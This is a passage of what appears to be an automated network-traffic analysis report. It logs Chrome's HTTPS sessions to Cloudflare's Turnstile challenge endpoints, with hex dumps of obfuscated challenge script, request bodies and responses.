                                                                  2024-12-30 21:42:20 UTC1369INData Raw: 72 28 4f 3d 43 5b 6a 37 28 31 34 33 37 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 31 2e 39 31 26 4f 7c 48 3c 3c 31 2e 30 39 2c 49 3d 3d 64 5b 6a 37 28 31 34 31 30 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 6a 37 28 35 36 38 29 5d 28 64 5b 6a 37 28 36 33 36 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 2e 34 34 7c 4f 2c 64 5b 6a 37 28 34 39 30 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 6a 37 28 35 36 38 29 5d 28 64 5b 6a 37 28 36 33 36 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 6a 37 28 31 34 33 37 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 6a
                                                                  Data Ascii: r(O=C[j7(1437)](0),s=0;8>s;H=1.91&O|H<<1.09,I==d[j7(1410)](j,1)?(I=0,G[j7(568)](d[j7(636)](o,H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;s<F;H=H<<1.44|O,d[j7(490)](I,j-1)?(I=0,G[j7(568)](d[j7(636)](o,H)),H=0):I++,O=0,s++);for(O=C[j7(1437)](0),s=0;16>s;H=d[j
                                                                  2024-12-30 21:42:20 UTC1369INData Raw: 30 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 4e 3d 64 5b 6a 61 28 35 39 36 29 5d 28 47 2c 48 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 4a 7c 3d 64 5b 6a 61 28 31 33 37 37 29 5d 28 64 5b 6a 61 28 31 35 36 39 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 48 3e 3e 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 46 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 64 5b 6a 61 28 35 36 35 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d
                                                                  Data Ascii: 0)]('|'),M=0;!![];){switch(L[M++]){case'0':N=d[ja(596)](G,H);continue;case'1':J|=d[ja(1377)](d[ja(1569)](0,N)?1:0,F);continue;case'2':H>>=1;continue;case'3':F<<=1;continue;case'4':d[ja(565)](0,H)&&(H=j,G=o(I++));continue}break}switch(J){case 0:for(J=0,K=M


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.449760104.18.94.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:20 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/404157209:1735593090:PkZ6LfythNHPr79mCMt43ygV4Jt_HfPkfi_yir-aMeY/8fa532ef18b9435c/c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 4049
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  CF-Challenge: c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://challenges.cloudflare.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:20 UTC4049OUTData Raw: 76 5f 38 66 61 35 33 32 65 66 31 38 62 39 34 33 35 63 3d 42 6e 5a 65 35 65 32 65 6b 65 68 65 71 65 6d 52 51 24 52 51 45 37 39 45 39 4d 59 49 39 59 51 39 37 70 4d 64 39 6b 70 51 6a 52 51 70 64 43 51 41 4e 65 64 4f 44 45 4e 4f 35 34 6e 39 2d 51 30 37 32 64 51 50 32 65 51 62 63 51 59 6f 78 51 49 77 37 51 4d 5a 34 65 6a 4e 51 78 65 32 35 77 51 71 52 41 42 52 51 31 79 45 39 31 6b 64 31 62 38 52 51 65 4f 59 45 6d 63 51 31 54 30 5a 4b 67 34 7a 4f 58 71 49 37 49 6d 62 32 51 41 51 51 54 52 44 77 4f 51 45 65 32 75 51 39 5a 70 44 78 65 32 63 30 4f 34 51 6a 6b 72 61 79 37 32 49 65 50 62 39 50 24 49 32 62 77 4e 4e 42 4f 51 66 65 68 67 34 51 59 58 6f 24 6e 51 38 65 4f 51 37 65 51 4b 51 6f 53 6e 76 52 39 64 71 59 59 34 51 6a 74 4b 39 44 72 6e 53 32 70 51 43 35 6a 59 64
                                                                  Data Ascii: v_8fa532ef18b9435c=BnZe5e2ekeheqemRQ$RQE79E9MYI9YQ97pMd9kpQjRQpdCQANedODENO54n9-Q072dQP2eQbcQYoxQIw7QMZ4ejNQxe25wQqRABRQ1yE91kd1b8RQeOYEmcQ1T0ZKg4zOXqI7Imb2QAQQTRDwOQEe2uQ9ZpDxe2c0O4Qjkray72IePb9P$I2bwNNBOQfehg4QYXo$nQ8eOQ7eQKQoSnvR9dqYY4QjtK9DrnS2pQC5jYd
                                                                  2024-12-30 21:42:20 UTC714INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:20 GMT
                                                                  Content-Type: text/plain; charset=UTF-8
                                                                  Content-Length: 80384
                                                                  Connection: close
                                                                  cf-chl-gen: R3qH3MGwOineH6/R1143hX6jxs/J/93F1u0wsGMkPM61PfKzxGhKZlvTIA6XZ6uvg1DkjvjJWdZDO07c2hm6pP68TWJ7KqgKRrEV2FKaCi0NUWYa/8Sn9cPkESoMvRJEcg/MfjhDtdgZSlVbiUMfFD/AHggWARrIAuiQG+OVvNTuzFfqW/xXJtzLwgkeZqHpUkQL+WoFF3ti/1C79+MNRD4KPJJBc6jdpDyk86GXHvm0s8nmr/CAhIgnwc8jGMYOMdROTKZhdELbPCNZEsILoUzBb7FypNkdDDsH6PQOyz2pe06e2/tpQsG8z5HZJ+5/aT2xZfCIYDPV+IpnzLOUlcTlKS4EwX7oNOQsDL/sF3xKslrlKZ8xefL2+LOsSmFQW6lRRhn4LwB0poQ3OsrAaBp4kYN2CK0dhy6REXwZUKC1e81SKxE77+N3SqVeCQ1YyVyV72aUed9m3XoO$dC4beqL+9pd9fWYl
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa532fa58b50f98-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:20 UTC655INData Raw: 75 36 36 30 71 37 66 41 65 4b 71 4a 73 38 4f 39 73 38 57 37 77 73 4a 39 66 39 4c 56 6c 48 72 53 78 63 76 43 7a 74 65 50 77 62 36 55 77 71 4f 4f 79 5a 43 6c 69 2b 50 57 33 4e 50 66 36 4b 44 53 7a 36 62 54 74 4a 2f 62 6f 62 61 63 6e 5a 36 66 39 75 4c 30 6f 2b 50 6f 37 4f 62 72 38 66 62 71 37 77 49 48 72 38 32 78 38 77 62 37 43 77 54 38 42 77 34 4f 39 73 7a 36 32 61 6e 41 77 63 4c 44 47 77 63 5a 78 78 77 50 47 52 44 2b 45 79 41 6c 46 69 55 6e 30 2f 48 56 47 43 6f 67 4c 79 67 68 4b 7a 49 79 47 2f 45 66 2f 63 33 4f 35 65 62 6e 36 44 4d 78 36 2f 51 74 4d 6a 59 77 4e 54 74 41 4e 44 6c 4c 55 41 64 49 53 6b 5a 50 44 2f 34 64 48 68 38 44 46 41 34 47 59 76 48 79 43 67 73 4d 44 51 34 50 45 42 46 52 56 6c 70 55 57 56 39 6b 57 46 31 76 64 42 30 37 48 33 73 4c 49 69 4d
                                                                  Data Ascii: u660q7fAeKqJs8O9s8W7wsJ9f9LVlHrSxcvCztePwb6UwqOOyZCli+PW3NPf6KDSz6bTtJ/bobacnZ6f9uL0o+Po7Obr8fbq7wIHr82x8wb7CwT8Bw4O9sz62anAwcLDGwcZxxwPGRD+EyAlFiUn0/HVGCogLyghKzIyG/Ef/c3O5ebn6DMx6/QtMjYwNTtANDlLUAdISkZPD/4dHh8DFA4GYvHyCgsMDQ4PEBFRVlpUWV9kWF1vdB07H3sLIiM
                                                                  2024-12-30 21:42:20 UTC1369INData Raw: 56 6f 61 70 69 6c 4a 6d 64 6c 35 79 69 70 35 75 73 72 72 4e 75 75 4a 4f 51 73 33 56 79 55 57 68 70 61 6d 74 73 62 57 35 76 63 48 46 79 63 38 47 66 76 4c 32 51 6b 33 72 53 78 63 76 43 7a 74 65 50 77 63 62 4b 78 4d 6e 50 31 4d 6a 5a 32 2b 43 62 30 62 6a 45 32 74 2f 59 78 36 47 41 6c 35 69 5a 6d 70 75 63 6e 5a 36 66 6f 4b 47 69 2b 66 58 6e 39 72 37 43 71 51 4c 30 2b 76 48 39 42 37 37 77 39 66 6e 7a 2b 50 34 45 39 77 6b 4c 45 4d 6f 4c 41 38 75 71 77 63 4c 44 78 4d 58 47 78 38 6a 4a 79 73 76 4d 45 51 58 32 47 75 50 73 30 79 77 66 4a 52 77 6f 4d 65 67 66 45 77 55 6f 38 65 7a 4c 7a 4f 50 6b 35 65 62 6e 36 4f 6e 71 36 2b 7a 74 37 68 5a 47 47 6b 4d 4b 44 2f 55 32 4f 7a 38 35 50 6b 52 4a 50 55 4a 55 57 52 41 70 57 53 31 57 48 52 54 79 43 67 73 4d 44 51 34 50 45 42
                                                                  Data Ascii: VoapilJmdl5yip5usrrNuuJOQs3VyUWhpamtsbW5vcHFyc8GfvL2Qk3rSxcvCztePwcbKxMnP1MjZ2+Cb0bjE2t/Yx6GAl5iZmpucnZ6foKGi+fXn9r7CqQL0+vH9B77w9fnz+P4E9wkLEMoLA8uqwcLDxMXGx8jJysvMEQX2GuPs0ywfJRwoMegfEwUo8ezLzOPk5ebn6Onq6+zt7hZGGkMKD/U2Oz85PkRJPUJUWRApWS1WHRTyCgsMDQ4PEB
                                                                  2024-12-30 21:42:20 UTC1369INData Raw: 6c 35 79 69 70 35 75 73 72 72 4e 75 68 5a 65 34 6c 48 5a 79 55 57 68 70 61 6d 74 73 62 57 35 76 63 48 46 79 63 38 75 6d 72 70 2b 4f 6b 33 72 53 78 63 76 43 7a 74 65 50 77 63 62 4b 78 4d 6e 50 31 4d 6a 5a 32 2b 43 62 35 63 44 49 75 61 69 66 66 70 57 57 6c 35 69 5a 6d 70 75 63 6e 5a 36 66 6f 4d 54 77 78 65 75 34 77 4b 63 41 38 76 6a 76 2b 77 57 38 37 76 50 33 38 66 62 38 41 76 55 48 43 51 37 49 33 67 76 66 42 74 4c 4d 71 38 4c 44 78 4d 58 47 78 38 6a 4a 79 73 76 4d 7a 52 30 6d 45 68 59 4a 35 75 37 56 4c 69 45 6e 48 69 6f 7a 36 68 30 69 4a 69 41 6c 4b 7a 41 6b 4e 54 63 38 39 6a 68 42 4c 54 45 6b 41 76 76 61 38 66 4c 7a 39 50 58 32 39 2f 6a 35 2b 76 76 38 4b 79 4e 50 4c 69 77 5a 48 67 56 64 55 46 5a 4e 57 57 49 61 54 46 46 56 54 31 52 61 58 31 4e 6b 5a 6d 73
                                                                  Data Ascii: l5yip5usrrNuhZe4lHZyUWhpamtsbW5vcHFyc8umrp+Ok3rSxcvCztePwcbKxMnP1MjZ2+Cb5cDIuaiffpWWl5iZmpucnZ6foMTwxeu4wKcA8vjv+wW87vP38fb8AvUHCQ7I3gvfBtLMq8LDxMXGx8jJysvMzR0mEhYJ5u7VLiEnHioz6h0iJiAlKzAkNTc89jhBLTEkAvva8fLz9PX29/j5+vv8KyNPLiwZHgVdUFZNWWIaTFFVT1RaX1NkZms
                                                                  2024-12-30 21:42:20 UTC1369INData Raw: 57 65 68 73 37 53 65 72 61 6d 2b 70 47 69 6e 61 72 61 78 78 6e 79 79 75 4c 4c 45 6c 73 4f 35 75 35 6a 4d 67 63 4f 2f 31 48 32 44 66 38 76 47 32 36 2f 4a 30 34 2b 51 69 49 36 4b 6e 61 47 6a 79 36 70 36 6b 5a 4b 54 6c 4a 57 57 6c 35 69 5a 6d 70 75 63 2b 6f 69 4a 6f 4b 47 69 6f 36 53 6c 70 71 65 6f 71 61 71 72 2f 76 49 44 42 51 4d 41 73 76 55 4a 42 66 65 2f 43 2f 34 50 78 4e 65 6e 76 72 2f 41 77 63 4c 44 78 4d 55 6b 73 62 4c 4a 79 73 76 4d 7a 63 37 50 30 42 45 57 47 68 51 5a 48 79 51 59 48 53 38 30 36 69 30 5a 43 78 6f 6c 2b 4f 4d 43 35 65 37 52 36 4f 6e 71 36 2b 7a 74 37 75 2f 77 38 66 4c 7a 4f 55 55 36 54 55 59 2f 53 56 41 4c 51 45 35 45 57 75 73 44 42 41 55 47 42 77 67 4a 43 67 73 4d 44 51 34 56 46 68 46 57 59 6c 64 71 59 31 78 6d 62 53 68 64 61 32 46 33
                                                                  Data Ascii: Wehs7Seram+pGinaraxxnyyuLLElsO5u5jMgcO/1H2Df8vG26/J04+QiI6KnaGjy6p6kZKTlJWWl5iZmpuc+oiJoKGio6Slpqeoqaqr/vIDBQMAsvUJBfe/C/4PxNenvr/AwcLDxMUksbLJysvMzc7P0BEWGhQZHyQYHS806i0ZCxol+OMC5e7R6Onq6+zt7u/w8fLzOUU6TUY/SVALQE5EWusDBAUGBwgJCgsMDQ4VFhFWYldqY1xmbShda2F3
                                                                  2024-12-30 21:42:20 UTC1369INData Raw: 56 6d 5a 32 68 70 61 6d 75 77 76 4c 48 45 76 62 62 41 78 34 4b 39 75 37 69 38 68 37 33 4b 79 63 32 2f 30 63 57 6c 30 63 62 5a 30 73 76 56 33 4c 6e 5a 33 74 58 68 31 39 37 65 6d 64 62 69 31 2b 72 6a 33 4f 62 74 71 4e 33 72 34 66 65 6f 72 49 75 69 6f 36 53 6c 70 71 65 6f 71 61 71 72 72 4b 30 47 2b 50 37 31 41 67 76 43 39 50 6e 39 39 2f 77 44 43 50 73 4e 44 78 54 4f 45 67 7a 6d 47 52 76 57 31 52 6f 66 45 42 34 6d 41 52 51 63 46 68 55 6e 49 79 66 64 33 53 73 74 4d 79 63 68 34 2b 62 73 49 7a 41 76 4d 79 55 33 4b 77 73 33 4c 44 38 34 4d 54 74 43 48 7a 39 45 4f 30 63 39 52 45 54 2b 54 30 4a 49 50 30 74 55 44 44 35 44 52 30 46 47 54 46 46 46 56 6c 68 64 47 46 74 56 4d 47 4a 6b 49 42 39 6a 61 46 6c 6e 62 30 70 64 5a 56 39 65 63 47 78 77 4a 79 64 6c 61 33 6b 72 4c
                                                                  Data Ascii: VmZ2hpamuwvLHEvbbAx4K9u7i8h73Kyc2/0cWl0cbZ0svV3LnZ3tXh197emdbi1+rj3ObtqN3r4feorIuio6SlpqeoqaqrrK0G+P71AgvC9Pn99/wDCPsNDxTOEgzmGRvW1RofEB4mARQcFhUnIyfd3SstMych4+bsIzAvMyU3Kws3LD84MTtCHz9EO0c9RET+T0JIP0tUDD5DR0FGTFFFVlhdGFtVMGJkIB9jaFlnb0pdZV9ecGxwJydla3krL
                                                                  2024-12-30 21:42:20 UTC1369INData Raw: 73 62 57 35 76 63 48 48 49 74 4d 5a 31 75 38 6e 4b 79 4d 79 6b 79 73 50 4e 72 73 4c 4c 78 38 62 59 68 61 4f 48 33 39 4c 59 7a 39 76 6b 6e 4e 50 66 33 72 65 72 6e 4e 72 73 33 4f 62 74 71 4f 33 68 33 76 48 75 37 71 71 39 6a 61 53 6c 70 71 65 6f 71 61 71 72 72 4b 32 75 72 37 43 78 73 72 4f 30 74 62 61 33 45 41 4d 4a 41 41 77 56 7a 50 59 4a 43 78 48 54 7a 41 73 5a 47 68 67 63 38 78 6f 54 48 66 30 53 47 78 63 57 4b 4f 44 56 47 69 41 63 4c 6a 50 6e 33 4f 51 30 4d 75 30 71 4a 44 49 70 4d 69 77 36 37 2f 49 47 31 65 7a 74 37 75 2f 77 38 66 4c 7a 39 50 58 32 39 2f 6a 35 2b 76 74 61 43 76 34 52 45 51 73 65 37 51 55 47 42 77 67 4a 43 67 73 4d 44 51 34 50 45 46 70 59 47 32 74 65 5a 46 74 6e 63 43 68 64 53 31 4e 46 4d 79 35 6d 52 45 74 31 56 54 77 76 4c 33 68 36 65 33
                                                                  Data Ascii: sbW5vcHHItMZ1u8nKyMykysPNrsLLx8bYhaOH39LYz9vknNPf3rernNrs3ObtqO3h3vHu7qq9jaSlpqeoqaqrrK2ur7CxsrO0tba3EAMJAAwVzPYJCxHTzAsZGhgc8xoTHf0SGxcWKODVGiAcLjPn3OQ0Mu0qJDIpMiw67/IG1ezt7u/w8fLz9PX29/j5+vtaCv4REQse7QUGBwgJCgsMDQ4PEFpYG2teZFtncChdS1NFMy5mREt1VTwvL3h6e3
                                                                  2024-12-30 21:42:20 UTC1369INData Raw: 77 73 75 44 75 4b 61 75 6f 49 36 4a 77 5a 2b 6d 30 4c 43 58 69 6f 72 54 31 64 62 57 32 74 33 66 32 64 58 67 34 74 6a 54 6e 74 58 69 34 75 6e 66 35 65 33 61 37 75 54 72 36 36 57 6f 71 61 48 39 6a 61 53 6c 70 71 65 6f 71 61 71 72 72 4b 32 75 72 37 43 78 73 72 4d 4d 2f 67 58 37 43 42 48 49 44 77 49 53 38 67 6b 4f 42 78 49 5a 47 63 30 4e 48 52 63 4e 48 78 55 63 48 4e 62 59 30 43 32 38 30 39 54 56 31 74 66 59 32 64 72 62 33 4e 33 65 33 2b 44 68 34 75 50 6b 35 65 59 2f 4d 6a 67 76 4f 30 54 37 4b 42 68 49 52 51 6e 37 2f 52 48 67 39 2f 6a 35 2b 76 76 38 2f 66 34 41 41 51 49 44 42 41 55 47 42 32 55 56 43 68 77 63 48 52 34 59 4b 2f 6f 53 45 78 51 56 46 68 63 59 47 52 6f 62 48 42 31 37 5a 47 78 30 5a 33 34 4f 4a 53 59 6e 4b 43 6b 71 4b 79 77 74 4c 69 38 77 4d 54 49
                                                                  Data Ascii: wsuDuKauoI6JwZ+m0LCXiorT1dbW2t3f2dXg4tjTntXi4unf5e3a7uTr66WoqaH9jaSlpqeoqaqrrK2ur7CxsrMM/gX7CBHIDwIS8gkOBxIZGc0NHRcNHxUcHNbY0C2809TV1tfY2drb3N3e3+Dh4uPk5eY/MjgvO0T7KBhIRQn7/RHg9/j5+vv8/f4AAQIDBAUGB2UVChwcHR4YK/oSExQVFhcYGRobHB17ZGx0Z34OJSYnKCkqKywtLi8wMTI
                                                                  2024-12-30 21:42:20 UTC1369INData Raw: 58 70 37 66 48 31 2b 66 34 43 42 31 64 72 4e 32 63 6e 50 6b 4d 6a 46 79 73 65 65 79 38 79 5a 6b 65 31 39 6c 4a 57 57 6c 35 69 5a 6d 70 75 63 6e 5a 36 66 6f 4b 47 69 6f 2b 66 6d 2b 65 79 76 30 66 66 6c 32 74 7a 33 78 62 66 4c 6e 4c 4f 30 74 62 62 32 38 2f 6a 31 7a 50 6e 36 76 74 7a 41 79 50 44 75 36 67 37 71 2b 64 2f 51 35 62 58 4d 7a 63 37 50 45 42 55 5a 45 78 67 65 49 78 63 63 4c 6a 4d 58 48 43 45 6c 48 79 51 71 4c 79 4d 6f 4f 6a 2f 31 4e 7a 6b 31 50 76 30 72 2f 45 59 64 4c 43 41 47 39 41 45 55 39 30 63 2f 55 76 73 68 50 31 4e 46 43 51 73 52 53 30 70 61 4f 31 46 57 54 78 4d 56 4b 50 66 34 45 42 45 53 45 31 5a 6e 57 31 68 6a 4e 41 52 65 58 58 42 6a 4a 6b 78 6d 57 57 74 4b 62 30 64 59 4c 30 4d 71 66 58 47 42 67 34 46 2b 54 42 78 32 64 59 68 37 50 6f 4f 47
                                                                  Data Ascii: Xp7fH1+f4CB1drN2cnPkMjFyseey8yZke19lJWWl5iZmpucnZ6foKGio+fm+eyv0ffl2tz3xbfLnLO0tbb28/j1zPn6vtzAyPDu6g7q+d/Q5bXMzc7PEBUZExgeIxccLjMXHCElHyQqLyMoOj/1Nzk1Pv0r/EYdLCAG9AEU90c/UvshP1NFCQsRS0paO1FWTxMVKPf4EBESE1ZnW1hjNAReXXBjJkxmWWtKb0dYL0MqfXGBg4F+TBx2dYh7PoOG
                                                                  2024-12-30 21:42:20 UTC1369INData Raw: 6e 55 79 73 6a 49 68 61 4f 48 33 4e 76 66 30 4b 64 33 65 49 2b 51 6b 5a 4c 57 33 4f 48 56 36 64 33 74 71 4e 37 66 36 64 44 44 73 36 47 2f 6f 2b 33 74 77 5a 47 6f 71 61 71 72 37 2f 58 36 37 67 50 32 42 38 48 2b 39 77 41 49 34 4d 75 36 32 4c 77 48 46 74 71 71 71 38 4c 44 78 4d 55 65 45 52 63 4f 47 69 50 61 44 52 49 57 45 42 55 62 49 42 51 6c 4a 79 7a 6d 4b 69 54 2b 4d 54 50 75 37 54 4d 6e 4d 44 4d 37 4b 77 6f 77 4d 6a 59 76 38 7a 49 36 4e 44 30 32 51 45 66 38 45 4e 2f 32 39 2f 6a 35 4c 45 6c 49 56 44 63 59 43 51 73 65 37 57 4c 76 38 45 35 65 57 45 35 67 56 6c 31 64 45 46 52 55 50 78 77 65 46 6e 49 43 47 52 6f 62 48 47 46 74 62 57 55 70 5a 32 39 70 63 6d 74 31 66 44 64 79 63 48 56 30 64 6f 4d 38 4d 58 64 2f 65 59 4a 37 68 59 78 48 6b 59 53 41 6b 59 5a 49 57
                                                                  Data Ascii: nUysjIhaOH3Nvf0Kd3eI+QkZLW3OHV6d3tqN7f6dDDs6G/o+3twZGoqaqr7/X67gP2B8H+9wAI4Mu62LwHFtqqq8LDxMUeERcOGiPaDRIWEBUbIBQlJyzmKiT+MTPu7TMnMDM7KwowMjYv8zI6ND02QEf8EN/29/j5LElIVDcYCQse7WLv8E5eWE5gVl1dEFRUPxweFnICGRobHGFtbWUpZ29pcmt1fDdycHV0doM8MXd/eYJ7hYxHkYSAkYZIW


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.449764104.18.94.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:21 UTC783OUTGET /cdn-cgi/challenge-platform/h/b/i/8fa532ef18b9435c/1735594940553/NTUnkiFwsG_vUbH HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:21 UTC200INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:21 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 61
                                                                  Connection: close
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533009f845e74-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:21 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5c 00 00 00 57 08 02 00 00 00 06 4a b5 cc 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: PNGIHDR\WJIDAT$IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.449765104.18.95.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:21 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/404157209:1735593090:PkZ6LfythNHPr79mCMt43ygV4Jt_HfPkfi_yir-aMeY/8fa532ef18b9435c/c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:21 UTC379INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:21 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  cf-chl-out: shFKxnm+zObHx9Jf5BFiL6w+Z0iN/I12itg=$GaO0vXq1DKu1PnkK
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533010fcf7d0b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:21 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.449766104.18.95.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:22 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8fa532ef18b9435c/1735594940553/NTUnkiFwsG_vUbH HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:22 UTC200INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:22 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 61
                                                                  Connection: close
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53304dcae440b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:22 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5c 00 00 00 57 08 02 00 00 00 06 4a b5 cc 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: PNGIHDR\WJIDAT$IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.449767104.18.94.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:22 UTC812OUTGET /cdn-cgi/challenge-platform/h/b/pat/8fa532ef18b9435c/1735594940555/c281c98da1c4ac9f168264b8621e465a54d01427d1008fed8de2e3729547d7f2/f_xc1VlLEk-hP_t HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Cache-Control: max-age=0
